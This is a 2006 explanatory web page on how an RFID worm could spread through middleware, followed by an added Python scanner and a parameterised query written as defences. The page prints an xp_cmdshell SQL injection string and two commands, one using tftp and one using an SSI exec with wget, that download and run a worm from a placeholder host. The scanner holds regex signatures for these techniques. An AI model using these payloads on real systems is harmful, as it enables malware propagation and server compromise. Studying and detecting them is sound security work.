How to Write an RFID Worm

A worm is a program that self-propagates across a network, exploiting security flaws in widely-used services. A worm is distinguishable from a virus in that a worm does not require any user activity to propagate. Worms usually have a payload, which performs activities ranging from deleting files, to sending information via email, to installing software patches. One of the most common payloads for a worm is to install a backdoor in the infected computer, which grants hackers easy return access to that computer system in the future.

An RFID worm propagates by exploiting security flaws in online RFID services. RFID worms do not necessarily require users to do anything (like scanning RFID tags) to propagate, although they will also happily spread via RFID tags, if given the opportunity.


RFID tags are generally too small to contain an entire worm. Therefore the tag will contain only enough of the worm to enable it to download the rest from a computer connected to the internet.

The RFID tag can either include binary code to download and execute the worm, or shell commands which do the same. Shell commands generally require less space than binary code and they are also more portable. Examples of what can be done using shell commands can be found here. However, some weaknesses may only allow binary code to be executed.

Worms may target any part of the RFID middleware to propagate. Some database systems provide SQL commands that execute shell commands on the database server. These commands can be abused to download and execute the worm. An example for SQL Server is shown in Example 1.

Apples'; EXEC Master..xp_cmdshell 'shell commands';--
Example 1 - Executing shell commands using SQL Server
The first part of the exploit (before the semicolon) performs SQL injection. It terminates the current query and starts a new query. The second part of the query uses SQL Server's xp_cmdshell stored procedure to execute shell commands. The final part of the query starts a SQL comment, which makes sure any remaining SQL inserted by the middleware is ignored, to prevent errors being logged.

An example of the shell commands that a worm would execute is shown in Example 2.

cd \Windows\Temp & tftp -i <ip> GET worm.exe & worm.exe
Example 2 - Downloading and executing a worm on Windows
These shell commands download the worm into the Windows temporary directory using the tftp utility, which comes standard with Windows. After the worm has been downloaded, it is executed.

Web-based components may also be susceptible. Server-side includes may allow shell commands to be executed, which can be abused to download and execute the worm in the same way.
When using SSI on Linux, the code to download and execute the worm might look like this:

<!--#exec cmd="wget http://ip/worm -O /tmp/worm; chmod +x /tmp/worm; /tmp/worm "-->
Example 3 - Downloading and executing a worm on Linux using SSI
These shell commands perform the same function as the previous Windows example, in this case using the wget utility. Since Linux requires programs to have an executable flag set, an extra statement is included to enable this flag.

Any part of the middleware that is written in C or C++ may be susceptible to buffer overflows, which can be used to inject binary code that handles propagation. We have not developed a worm using buffer overflows, but the buffer overflow example that executes shell commands could be used to create a worm, by having it execute one of the previous shell commands.
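The propagation techniques above (Examples 1 to 3) all rely on the middleware treating raw tag contents as code. The following added example, which is not part of the original page, shows the two defensive checks a middleware author would want: a scanner that flags tag contents matching the patterns described on this page, and a parameterised database lookup in which a tag carrying Example 1 is bound as data rather than spliced into the query. The signature names, the `products` table and the SQLite database are assumptions made for this example.

```python
import re
import sqlite3

# Constructed sample tag contents: the three strings from the page plus a benign tag.
SAMPLE_TAGS = {
    "benign": "Apples",
    "sql": "Apples'; EXEC Master..xp_cmdshell 'shell commands';--",
    "ssi": '<!--#exec cmd="wget http://ip/worm -O /tmp/worm; chmod +x /tmp/worm; /tmp/worm "-->',
    "win": "cd \\Windows\\Temp & tftp -i <ip> GET worm.exe & worm.exe",
}

# Signatures for the propagation techniques this page describes. The names are
# assumptions made for this example, not taken from the page.
SIGNATURES = [
    # quote closes a string literal, ';' starts a new statement, '--' discards the rest
    ("sql-terminate-and-comment", re.compile(r"'\s*;.*--", re.S)),
    ("sql-xp_cmdshell", re.compile(r"xp_cmdshell", re.I)),
    ("ssi-exec-directive", re.compile(r"<!--\s*#exec\b", re.I)),
    # a download utility chained to a further command
    ("shell-download-and-run", re.compile(r"\b(tftp|wget|curl)\b.*[;&|]", re.I)),
]


def scan_tag(raw: str) -> list[str]:
    """Return the names of every signature that matches the raw tag contents."""
    return [name for name, pat in SIGNATURES if pat.search(raw)]


def lookup_product(conn: sqlite3.Connection, tag_value: str):
    """Parameterised lookup: tag_value is bound as data by the driver, so a tag
    carrying Example 1 cannot terminate the query or invoke a stored procedure."""
    row = conn.execute("SELECT name FROM products WHERE code = ?", (tag_value,)).fetchone()
    return row[0] if row else None


def demo() -> dict:
    """Scan each sample tag and look it up safely; the injected tags match no product."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (code TEXT, name TEXT)")
    conn.execute("INSERT INTO products VALUES ('Apples', 'Golden Delicious')")
    return {name: (scan_tag(raw), lookup_product(conn, raw)) for name, raw in SAMPLE_TAGS.items()}


if __name__ == "__main__":
    for name, (hits, product) in demo().items():
        print(f"{name:7} hits={hits} product={product!r}")
```

Tags with a non-empty hit list should be rejected (and logged) before any further processing; the parameterised lookup is the second line of defence for anything the scanner misses.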

Last modified: Thursday, 02 March 2006 21:27, CET